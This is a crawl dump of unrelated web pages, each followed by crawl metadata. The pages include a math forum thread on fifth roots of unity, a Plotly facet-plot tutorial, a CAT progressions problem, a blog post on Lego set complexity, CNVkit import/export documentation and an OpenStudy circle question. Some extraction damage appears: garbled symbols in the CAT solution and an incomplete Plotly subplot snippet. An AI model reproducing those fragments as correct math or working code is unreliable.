# Math Help - solve for x 1. ## solve for x Solve for x: x^4 + x^3 + x^2 + x + 1 = 0. 2. If you draw the graph of x^4 + x^3 + x^2 + x + 1, it won't cut the x-axis. So, x^4 + x^3 + x^2 + x + 1 = 0 has no real roots 3. Thanks songoku, I have an UGLY solution for this, but i am hoping THAT someone may be able to solve this elegantly. 4. If anyone's curious, the four complex roots are the following: x ≈ 0.309 + 0.951i x ≈ 0.309 - 0.951i x ≈ -0.809 + 0.588i x ≈ -0.809 - 0.588i (using a computer, of course ) Polar form: $x = \cos \frac{2\pi}{5} + i\sin \frac{2\pi}{5}$ $x = \cos \frac{8\pi}{5} + i\sin \frac{8\pi}{5}$ $x = \cos \frac{4\pi}{5} + i\sin \frac{4\pi}{5}$ $x = \cos \frac{6\pi}{5} + i\sin \frac{6\pi}{5}$ 01 5. Originally Posted by pacman Solve for x: x^4 + x^3 + x^2 + x + 1 = 0. Observe that $(x-1)(x^4+x^3+x^2+x+1)=x^5-1.$ Hence the solution you want is the set of the four complex 5th roots of unity. No need to plot graph or use computer. 6. Hint: divide BS x^2, we have x^2 + x + 1 + 1/x + 1/x^2 = 0, rearranging it and then grouping it (x + 1/x)^2 + (x + 1/x) + 1 = 0 It is now quadratic in x + 1/x, the result is quite ugly but it can generate a result . . . 7. Originally Posted by pacman Hint: divide BS x^2, we have x^2 + x + 1 + 1/x + 1/x^2 = 0, rearranging it and then grouping it (x + 1/x)^2 + (x + 1/x) + 1 = 0 It is now quadratic in x + 1/x, the result is quite ugly but it can generate a result . . . $x+\frac{1}{x}=\frac{-1\pm\sqrt{-3}}{2}$ Then $x=\frac{-\left(\frac{-1\pm\sqrt{-3}}{2}\right)\pm\sqrt{\left(\frac{-1\pm\sqrt{-3}}{2}\right)^2-4}}{2}$ Is this what you are saying? 8. I think there's a typo in pacman's last post. Instead of $\left(x + \frac{1}{x}\right)^2 + \left(x + \frac{1}{x}\right) + 1 = 0$ it should have been $\left(x + \frac{1}{x}\right)^2 + \left(x + \frac{1}{x}\right) {\color{red}-}\; 1 = 0$ 01 9. i mixed it up in a bowl of soup, yeongil is correct with his observation . . . .
2015-07-28 06:26:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 9, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7951334714889526, "perplexity": 614.9547154644899}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-32/segments/1438042981576.7/warc/CC-MAIN-20150728002301-00031-ip-10-236-191-2.ec2.internal.warc.gz"}
https://plotly.com/python/facet-plots/
Black Lives Matter. Please consider donating to Black Girls Code today. # Facet and Trellis Plots in Python How to make Facet and Trellis Plots in Python with Plotly. If you're using Dash Enterprise's Data Science Workspaces, you can copy/paste any of these cells into a Workspace Jupyter notebook. Find out if your company is using Dash Enterprise. New to Plotly? Plotly is a free and open-source graphing library for Python. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. ### Facet and Trellis Plots¶ Facet plots, also known as trellis plots or small multiples, are figures made up of multiple subplots which have the same set of axes, where each subplot shows a subset of the data. While it is straightforward to use plotly's subplot capabilities to make such figures, it's far easier to use the built-in facet_row and facet_col arguments in the various Plotly Express functions. Plotly Express is the easy-to-use, high-level interface to Plotly, which operates on a variety of types of data and produces easy-to-style figures. ### Scatter Plot Column Facets¶ In [1]: import plotly.express as px df = px.data.tips() fig = px.scatter(df, x="total_bill", y="tip", color="smoker", facet_col="sex") fig.show() ### Bar Chart Row Facets¶ In [2]: import plotly.express as px df = px.data.tips() fig = px.bar(df, x="size", y="total_bill", color="sex", facet_row="smoker") fig.show() ### Wrapping Column Facets¶ When the facet dimension has a large number of unique values, it is possible to wrap columns using the facet_col_wrap argument. In [3]: import plotly.express as px df = px.data.gapminder() fig = px.scatter(df, x='gdpPercap', y='lifeExp', color='continent', size='pop', facet_col='year', facet_col_wrap=4) fig.show() ### Histogram Facet Grids¶ In [4]: import plotly.express as px df = px.data.tips() fig = px.histogram(df, x="total_bill", y="tip", color="sex", facet_row="time", facet_col="day", category_orders={"day": ["Thur", "Fri", "Sat", "Sun"], "time": ["Lunch", "Dinner"]}) fig.show() ### Facets With Independent Axes¶ By default, facet axes are linked together: zooming inside one of the facets will also zoom in the other facets. You can disable this behaviour when you use facet_row only, by disabling matches on the Y axes, or when using facet_col only, by disabling matches on the X axes. It is not recommended to use this approach when using facet_row and facet_col together, as in this case it becomes very hard to understand the labelling of axes and grid lines. In [5]: import plotly.express as px df = px.data.tips() fig = px.scatter(df, x="total_bill", y="tip", color='sex', facet_row="day") fig.update_yaxes(matches=None) fig.show() In [6]: import plotly.express as px df = px.data.tips() fig = px.scatter(df, x="total_bill", y="tip", color='sex', facet_col="day") fig.update_xaxes(matches=None) fig.show() ### Customize Subplot Figure Titles¶ Since subplot figure titles are annotations, you can use the for_each_annotation function to customize them, for example to remove the equal-sign (=). In the following example, we pass a lambda function to for_each_annotation in order to change the figure subplot titles from smoker=No and smoker=Yes to just No and Yes. In [7]: import plotly.express as px fig = px.scatter(px.data.tips(), x="total_bill", y="tip", facet_col="smoker") fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1])) fig.show() ### Controlling Facet Ordering¶ By default, Plotly Express lays out categorical data in the order in which it appears in the underlying data. Every 2-d cartesian Plotly Express function also includes a category_orders keyword argument which can be used to control the order in which categorical axes are drawn, but beyond that can also control the order in which discrete colors appear in the legend, and the order in which facets are laid out. In [8]: import plotly.express as px df = px.data.tips() fig = px.bar(df, x="day", y="total_bill", color="smoker", barmode="group", facet_col="sex", category_orders={"day": ["Thur", "Fri", "Sat", "Sun"], "smoker": ["Yes", "No"], "sex": ["Male", "Female"]}) fig.show() ### Controlling Facet Spacing¶ The facet_row_spacing and facet_col_spacing arguments can be used to control the spacing between rows and columns. These values are specified in fractions of the plotting area in paper coordinates and not in pixels, so they will grow or shrink with the width and height of the figure. The defaults work well with 1-4 rows or columns at the default figure size with the default font size, but need to be reduced to around 0.01 for very large figures or figures with many rows or columns. Conversely, if activating tick labels on all facets, the spacing will need to be increased. In [9]: import plotly.express as px df = px.data.gapminder().query("continent == 'Africa'") fig = px.line(df, x="year", y="lifeExp", facet_col="country", facet_col_wrap=7, facet_row_spacing=0.04, # default is 0.07 when facet_col_wrap is used facet_col_spacing=0.04, # default is 0.03 height=600, width=800, title="Life Expectancy in Africa") fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1])) fig.update_yaxes(showticklabels=True) fig.show() ### Synchronizing axes in subplots with matches¶ Using facet_col from plotly.express let zoom and pan each facet to the same range implicitly. However, if the subplots are created with make_subplots, the axis needs to be updated with matches parameter to update all the subplots accordingly. Zoom in one trace below, to see the other subplots zoomed to the same x-axis range. To pan all the subplots, click and drag from the center of x-axis to the side: In [10]: import plotly.graph_objects as go from plotly.subplots import make_subplots import numpy as np N = 20 x = np.linspace(0, 1, N) fig = make_subplots(1, 3) for i in range(1, 4): fig.update_xaxes(matches='x') fig.show() Dash is an open-source framework for building analytical applications, with no Javascript required, and it is tightly integrated with the Plotly graphing library. Learn about how to install Dash at https://dash.plot.ly/installation. Everywhere in this page that you see fig.show(), you can display the same figure in a Dash application by passing it to the figure argument of the Graph component from the built-in dash_core_components package like this: import plotly.graph_objects as go # or plotly.express as px fig = go.Figure() # or any Plotly Express function e.g. px.bar(...)
2020-10-27 04:34:50
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.27877840399742126, "perplexity": 7067.248212567805}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107893011.54/warc/CC-MAIN-20201027023251-20201027053251-00280.warc.gz"}
https://iim-cat-questions-answers.2iim.com/quant/algebra/progressions/progressions_17.shtml
# Arithmetic and Geometric Progressions You are here: Home  CAT Questionbank   CAT Quant  AP, GP  Question 17 Investments and Progressions ## Total Amount Ram invest different amounts during the year on shares. S1, S2, S3……….Sm are different sums of ‘n’ amounts invested in ‘m’ years. If the amounts invested during the years are in A.P whose first terms are 1,2,3…..m and common difference are 1,3,5…..,(2m-1) respectively then find the total amount invested by Ram in ‘m’ years. 1. n(m+1) 2. m+1 3. $\frac{mn}{2}$(mn+1) 4. cannot be determined Choice C. $\frac{mn}{2}$(mn+1) ## Detailed Solution Clearly, A/Q we have S1 = $\frac{n}{2}$ * [2x1 + (n-1) x1] [∵ a=1 d=1] S2 = $\frac{n}{2}$ * [2x2 + (n-1) x3] [∵ a=2 d=3] S3 = $\frac{n}{2}$ * [2x3 + (n-1) x5] [∵ a=3 d=5] Sm = $\frac{n}{2}$ * [2xm + (n-1) x (2m-1)] [∵a=m d= (2m-1)] ∴ (S1 + S2 + S3……+ Sm) = $\frac{n}{2}$ * [2x{1+2+3+4…+m} +(n-1)x{1+3+5….+(2m-1)}] = $\frac{n}{2}$ * [{2x𝑚2(1+m)}+(n-1)x𝑚2{1+ (2m-1)}] [∵𝑆=𝑛2(𝑎+𝑙)] = $\frac{n}{2}$ * [m(m+1) + m2(n-1)] = 𝑚𝑛2 [(m+1)+m(n-1)] = $\frac{mn}{2}$(mn+1) Correct Answer: $\frac{mn}{2}$ (mn+1) ## Our Online Course, Now on Google Playstore! ### Fully Functional Course on Mobile All features of the online course, including the classes, discussion board, quizes and more, on a mobile platform. ### Cache Content for Offline Viewing Download videos onto your mobile so you can learn on the fly, even when the network gets choppy! ## More questions from Progressions With some simple but very powerful ideas, one can cut down on a lot of working when it comes to progressions. For example, anchoring a progression around its middle term can be very useful. Reinforce these ideas with these questions.
2018-09-23 08:22:17
{"extraction_info": {"found_math": true, "script_math_tex": 11, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.45772379636764526, "perplexity": 12125.462662910824}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267159165.63/warc/CC-MAIN-20180923075529-20180923095929-00410.warc.gz"}
http://www.mathgoespop.com/2012/01/lego-math-maniac.html
# Lego Math Maniac Though I have lived in Southern California for several years, I have never been to Legoland, a theme park based around the classic (and awesome) children’s toys.  The park perennially sits in the shadow of more popular parks in the region (e.g. Disneyland, Universal Studios, and the Banana Club Museum), and its prices make it hard to justify a visit for an adult male with no children, no matter how many fond Lego memories he may have from his childhood.  However, given the recent attention Lego has received in the context of mathematics, it may be time to finally plan a trip. A recent article on Wired’s website discusses the mathematics of Lego – more specifically, it highlights an article on the complexity of Lego systems.  As any child will tell you, Lego sets can vary from very simple, small sets, to much larger and more complicated ones.  As a simple corollary, smaller sets will have fewer pieces, and larger sets will have more pieces.  But how does the number of types of pieces grow as the size of the set grows?  For example, if a 100 piece set consists of 10 different types of pieces, is it reasonable to guess that a 1000 piece set will consist of 100 different types of pieces? In a word, no.  Though the number of different types of pieces will grow as the size of a set grows, it will grow slower than the size of the set (in other words, it will grow sub-linearly).  To put it another way, as the size of the Lego set grows, rather than building more and more new types of pieces, the same types of pieces that are present in smaller sets tend to be used in new ways.  The effect is that the proportion of distinct piece types decreases as the size of the set grows.  From a mathematical standpoint, if we let y denote the number of different types of pieces, and x be the number of pieces, then this power law is giving us the following equation: $y = Ax^{b},$ for some constants A and b, with b between 0 and 1.  While y grows as x grows, it does not grow as quickly as x itself. Taken in a broader context, though, this should not be surprising.  Examples of similar phenomena are prevalent throughout nature, as well as in made-made phenomena such as urban planning.  One example cited in the Wired article is Kleiber’s Law, which states that the ratio of an animal’s metabolic rate to its mass tends to decrease as mass increases (in other words, larger animals are capable of metabolizing more efficiently).  Here’s an article that discusses an analogue of this power law in the context of brain development, and relates this to the development of cities. So the next time you give a Lego set to a child, feel free to explain this connection – I’m sure any child will welcome the math lesson (at least, any child worth giving a Lego set to in the first place).  It’s also worth noting that this phenomenon is most likely not unique to Lego sets – I am eagerly awaiting a similar report on the mathematics of Tinkertoys – though unfortunately, in this case the number of piece types seems not to have increased in nearly a century. ### 5 comments to Lego Math Maniac • Matt Foulger Nice post Matt. Nice shout out to Kleiber’s law. I’ve watched a presentation on the metabolism of cities before and as an urban planning dilettante I found it quite interesting. As for Lego, I definitely thought about the complexity and size of Lego sets as a kid but I couldn’t figure out the relationship, being 11. It seemed like you had to get the bigger sets in order to score the cool new pieces, but there never seemed to be enough of them in the set. Actually, when it came to free form creative rebuilding, the true magic of Lego, I found the funky pieces to be less useful because there wasn’t a critical mass of pieces in their style to be of much use. I usually found myself wanting more of the ‘core’ style pieces so I could build bigger castle walls, for example. By the way, I’m sure someone could get some pretty interesting results from analyzing the aggregate inventory of the big Lego piece resellers online. Every piece has a standard code and they are categorized by color, size, etc. Cheers dude. • I totally agree with regards to creative rebuilding. My own personal preference was to take the heads of all of my lego men and form a giant lego head totem pole, but perhaps this is not something I should so freely admit. Nice idea regarding Lego inventory as well. I wonder which colors are the most popular! • Smith 1993… I was a completely inspired lego maniac. I had two “giant” card tables in the basement completely devoted to Lego worlds I was building. One was of the “Town” variety, while the other was of the “Pirate” scene. For a time, my mother would always gift me with same small lego pack (car with a motorcycle and a little trailer) whenever I was sick. After receiving it three times, I debated saying something to her. Though I realized that while I never really cared to build the intended sets, I did now have a small stock pile of the “unique” parts that allowed me to really start doing some fun stuff with those parts. There is something to be said for the smaller cheaper packs, but you have to get a lot of them to build up the value of those random parts. • Patrick Holy smokes, that Banana Club Museum is a little frightening. • @Smith we should organize a lego playdate asap. @Patrick, if by frightening you mean fantastic, then yes, I agree. To everyone else, a reader sent a great little Lego infographic my way. Did you know that Lego designs sets for university aged students? If only I had known! Here’s the link: http://www.onlinecollege.org/2012/01/30/the-learning-power-of-lego/ (thanks Muhammad!)
2014-12-18 09:30:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4531690180301666, "perplexity": 980.2276588594432}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1418802765722.114/warc/CC-MAIN-20141217075245-00048-ip-10-231-17-201.ec2.internal.warc.gz"}
https://www.learningfarm.com/web/practicePassThrough.cfm?TopicID=1300
Standard: Description: Standard: Description: Standard: Math.6.RP.3c or 6.RP.A.3.C Description: Find a percent of a quantity as a rate per 100 (e.g., 30% of a quantity means 30/100 times the quantity); solve problems involving finding the whole, given a part and the percent. 6th Grade Math - Percents Lesson
2020-09-27 01:48:44
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 2, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4707702100276947, "perplexity": 3926.3515454992735}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400249545.55/warc/CC-MAIN-20200926231818-20200927021818-00635.warc.gz"}
https://www.gradesaver.com/textbooks/math/precalculus/precalculus-10th-edition/chapter-5-exponential-and-logarithmic-functions-5-3-exponential-functions-5-3-assess-your-understanding-page-280/2
## Precalculus (10th Edition) $x=-4$ or $x=1$ Subtract $4$ from each side: $x^2+3x-4=0$ Factor the trinomial to obtain: $x^2+3x-4=0\\ (x+4)(x-1)=0$ Use the Zero-Product Property to obtain: $x+4=0$ or $x-1=0$ Hence, $x=-4$ or $x=1$
2021-10-27 07:05:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.613109827041626, "perplexity": 580.1392605756465}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588102.27/warc/CC-MAIN-20211027053727-20211027083727-00344.warc.gz"}
http://cnvkit.readthedocs.io/en/stable/importexport.html
# Compatibility and other I/O¶ ## version¶ Print CNVkit’s version as a string on standard output: cnvkit.py version If you submit a bug report or feature request for CNVkit, please include the CNVkit version in your message so we can help you more efficiently. ## import-picard¶ Convert Picard CalculateHsMetrics per-target coverage files (.csv) to the CNVkit .cnn format: cnvkit.py import-picard *.hsmetrics.targetcoverages.csv *.hsmetrics.antitargetcoverages.csv cnvkit.py import-picard picard-hsmetrics/ -d cnvkit-from-picard/ You can use Picard tools to perform the bin read depth and GC calculations that CNVkit normally performs with the coverage and reference commands, if need be. Procedure: 1. Use the target and antitarget commands to generate the “targets.bed” and “antitargets.bed” files. 2. Convert those BED files to Picard’s “interval list” format by adding the BAM header to the top of the BED file and rearranging the columns – see the Picard command BedToIntervalList. 3. Run Picard CalculateHsMetrics on each of your normal/control BAM files with the “targets” and “antitargets” interval lists (separately), your reference genome, and the “PER_TARGET_COVERAGE” option. 4. Use import-picard to convert all of the PER_TARGET_COVERAGE files to CNVkit’s .cnn format. 5. Use reference to build a CNVkit reference from those .cnn files. It will retain the GC values Picard calculated; you don’t need to provide the reference genome sequence again to get GC (but you if you do, it will also calculate the RepeatMaster fraction values) 6. Use batch with the -r/--reference option to process the rest of your test samples. ## import-seg¶ Convert a file in the SEG format (e.g. the output of standard CBS or the GenePattern server) into one or more CNVkit .cns files. The chromosomes in a SEG file may have been converted from chromosome names to integer IDs. Options in import-seg can help recover the original names. • To add a “chr” prefix, use “-p chr”. • To convert chromosome indices 23, 24 and 25 to the names “X”, “Y” and “M” (a common convention), use “-c human”. • To use an arbitrary mapping of indices to chromosome names, use a comma-separated “key:value” string. For example, the human convention would be: “-c 23:X,24:Y,25:M”. ## import-theta¶ Convert the ”.results” output of THetA2 to one or more CNVkit .cns files representing subclones with integer absolute copy number in each segment. cnvkit.py import-theta Sample.cns Sample.BEST.results See the page on tumor Tumor heterogeneity for more guidance on performing this analysis. ## export¶ Convert copy number ratio tables (.cnr files) or segments (.cns) to another format. ### bed¶ Segments can be exported to BED format to support a variety of other uses, such as viewing in a genome browser. By default only regions with copy number different from the given ploidy (default 2) are output. (Notice what this means for allosomes.) To output all segments, use the --show all option. The BED format represents integer copy numbers in absolute scale, not log2 ratios. If the input .cns file contains a “cn” column with integer copy number values, as generated by the call command, export bed will use those values. Otherwise the log2 ratio value of each input segment is converted and rounded to an integer value, similar to the call -m clonal method. # Estimate integer copy number of each segment cnvkit.py call Sample.cns -y -o Sample.call.cns # Show estimated integer copy number of all regions cnvkit.py export bed Sample.call.cns --show all -y -o Sample.bed The same BED format can also specify CNV regions to the FreeBayes variant caller with FreeBayes’s --cnv-map option: # Show only CNV regions cnvkit.py export bed Sample.call.cns -o all-samples.cnv-map.bed ### vcf¶ Convert segments, ideally already adjusted by the call command, to a VCF file. Copy ratios are converted to absolute integers, as with BED export, and VCF records are created for the segments where the copy number is different from the expected ploidy (e.g. 2 on autosomes, 1 on haploid sex chromosomes, depending on sample sex). Chromosomal sex can be specified with the -x/--sample-sex option, or will be guessed automatically. If a male reference is used, use -y/--male-reference to say so. Note that these are different: If a female sample is run with a male reference, segments on chromosome X with log2-ratio +1 will be skipped, because that’s the expected copy number, while an X-chromosome segment with log2-ratio 0 will be printed as a hemizygous loss. cnvkit.py export vcf Sample.cns -y -g female -i "SampleID" -o Sample.cnv.vcf ### cdt, jtv¶ A collection of probe-level copy ratio files (*.cnr) can be exported to Java TreeView via the standard CDT format or a plain text table: cnvkit.py export jtv *.cnr -o Samples-JTV.txt cnvkit.py export cdt *.cnr -o Samples.cdt ### seg¶ Similarly, the segmentation files for multiple samples (*.cns) can be exported to the standard SEG format to be loaded in the Integrative Genomic Viewer (IGV): cnvkit.py export seg *.cns -o Samples.seg ### nexus-basic¶ The format nexus-basic can be loaded directly by the commercial program Biodiscovery Nexus Copy Number, specifying the “basic” input format in that program. This allows viewing CNVkit data as if it were from array CGH. This is a tabular format very similar to .cnr files, with the columns: 1. chromosome 2. start 3. end 4. log2 ### nexus-ogt¶ The format nexus-ogt can be loaded directly by the commercial program Biodiscovery Nexus Copy Number, specifying the “Custom-OGT” input format in that program. This allows viewing CNVkit data as if it were from a SNP array. This is a tabular format similar to .cnr files, but with B-allele frequencies (BAFs) extracted from a corresponding VCF file. The format’s columns are (with .cnr equivalents): 1. “Chromosome” (chromosome) 2. “Position” (start) 3. “Position” (end) 4. “Log R Ratio” (log2) 5. “B-Allele Frequency” (from VCF) The positions of each heterozygous variant record in the given VCF are matched to bins in the given .cnr file, and the variant allele frequencies are extracted and assigned to the matching bins. • If a bin contains no variants, the BAF field is left blank • If a bin contains multiple variants, the BAFs of those variants are “mirrored” to be all above .5 (e.g. BAF of .3 becomes .7), then the median is taken as the bin-wide BAF. ### theta¶ THetA2 is a program for estimating normal-cell contamination and tumor subclone population fractions based on a tumor sample’s copy number profile and, optionally, SNP allele frequencies. (See the page on tumor Tumor heterogeneity for more guidance.) THetA2’s input file is a BED-like file, typically with the extension .interval_count, listing the read counts within each copy-number segment in a pair of tumor and normal samples. CNVkit can generate this file given the CNVkit-inferred tumor segmentation (.cns), bypassing the initial step of THetA2, CreateExomeInput, which counts the reads in each sample’s BAM file. The normal-sample read counts in this file are used for weighting each segment in THetA2’s calculations. We recommend providing these to export theta via the CNVkit pooled or paired reference file (.cnn) you created for your panel: # From an existing CNVkit reference cnvkit.py export theta Sample_Tumor.cns reference.cnn -o Sample.theta2.interval_count The THetA2 normal read counts can also be derived from the normal sample’s bin log2 ratios, if for some reason this is all you have: # From a paired normal sample cnvkit.py export theta Sample_Tumor.cns Sample_Normal.cnr -o Sample.theta2.interval_count If neither file is given, the THetA2 normal read counts will be calculated from the segment weight values in the given .cns file, or the number of probes if the “weight” column is missing, or as a last resort, the segment sizes if the “probes” column is also missing: # From segment weights and/or probe counts cnvkit.py export theta Sample_Tumor.cns -o Sample.theta2.interval_count THetA2 also can take the tumor and normal samples’ SNP allele frequencies as input to improve its estimates. THetA2 uses another custom format for these values, and provides another script for creating these files from VCF that we’d again prefer to bypass. CNVkit’s export theta command produces these two additional files when given a VCF file of paired tumor-normal SNV calls with the -v/--vcf option: cnvkit.py export theta Sample_Tumor.cns reference.cnn -v Sample_Paired.vcf This produces three output files; -o will be used for the read count file, while the SNV allele count files will be named according to the .cns file, e.g. Sample_Tumor.tumor.snp_formatted.txt and Sample_Tumor.normal.snp_formatted.txt.
2017-12-17 06:08:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2958049178123474, "perplexity": 12234.577386522808}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948593526.80/warc/CC-MAIN-20171217054825-20171217080825-00115.warc.gz"}
https://questioncove.com/updates/4fc153a0e4b0964abc833bf9
Mathematics OpenStudy (anonymous): The plans of a public park include a circular fountain. The outline of the fountain can be modeled with the equation (x-4)^2 + (y+5)^2 = 50, where the units are meters and the graph is on a grid map of the park. a. Find the coordinates of the center. b. Find the circumference of the fountain. any help would be gladly appreciated xxx 6 years ago OpenStudy (anonymous): the circle equation$\left( x - a \right)^{2} + \left( y - b \right)^{2} = r^{2}$has center (a,b) and radius r 6 years ago OpenStudy (anonymous): Thank you :) 6 years ago Latest Questions eviant: Math help pls 2 hours ago 7 Replies 1 Medal eviant: Math help pls 3 hours ago 3 Replies 1 Medal eviant: Math help pls 3 hours ago 8 Replies 1 Medal AGENTJSVSL: What could it be if it isn't A? 6 hours ago 3 Replies 1 Medal Vocaloid: restriction endonuclease question 6 hours ago 3 Replies 0 Medals Vocaloid: restriction endonuclease question 7 hours ago 3 Replies 0 Medals Vocaloid: restriction enzyme solution check 7 hours ago 3 Replies 0 Medals Vocaloid: PCR question 7 hours ago 4 Replies 0 Medals Vocaloid: restriction enzyme question, solution check 7 hours ago 4 Replies 1 Medal rootbeer003: How does the revolution of the moon affect its appearance? 9 hours ago 2 Replies 0 Medals eviant: Math help pls 9 hours ago 3 Replies 1 Medal Moon: Biochemistry Tutorial: DNA Cloning 7 hours ago 10 Replies 0 Medals HarleyQuinn112: i need help on this question please anyone 9 hours ago 10 Replies 2 Medals helpmeplzz: can someone help me with algebra 2 11 hours ago 4 Replies 1 Medal HarleyQuinn112: can someone help me on these two questions please? 12 hours ago 8 Replies 1 Medal
2019-03-21 09:53:04
